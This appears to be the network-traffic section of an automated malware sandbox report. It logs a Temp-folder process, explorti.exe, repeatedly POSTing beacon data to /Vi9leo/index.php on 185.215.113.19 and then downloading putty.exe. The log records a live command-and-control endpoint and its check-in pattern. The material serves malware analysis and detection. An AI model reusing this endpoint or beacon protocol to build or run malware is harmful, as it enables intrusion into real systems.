Jul 26, 2024 21:01:52.134804010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49776	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:52.254131079 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:53.121486902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:53.123652935 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:53.377423048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49777	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:53.489151955 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:54.518018961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:54.520632982 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:54.529010057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:54.799509048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49778	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:54.911815882 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:55.701024055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:55.701761007 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:55.953627110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49779	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:56.067954063 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:56.842999935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:56.843673944 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:57.095917940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49780	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:57.222336054 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:58.030492067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:58.033875942 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:58.290024042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49781	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:58.410785913 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:59.240778923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:59.245872974 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:59.866290092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 21:01:59.873215914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49782	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:59.989423037 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:02:00.745026112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:02:00.745867968 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:02:00.993918896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49783	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:01.125601053 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:02:01.904905081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:02:01.905936003 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:02:02.170490980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49784	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:02.292021036 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:02:03.055131912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49785	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:03.095145941 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:02:03.842138052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49786	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:03.960124016 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:02:05.487545013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:02:05.488701105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:02:05.491005898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:02:05.502137899 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:02:05.749120951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:02:06.020647049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49787	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:06.245791912 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:02:07.018898010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49788	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:07.028471947 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49789	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:02:07.192560911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:02:07.980844975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:02:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49760	93.93.131.124	443	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 19:01:32 UTC	74	OUT	GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1 Host: the.earth.li
2024-07-26 19:01:32 UTC	227	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 19:01:32 GMT Server: Apache Location: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe Content-Length: 302 Connection: close Content-Type: text/html; charset=iso-8859-1
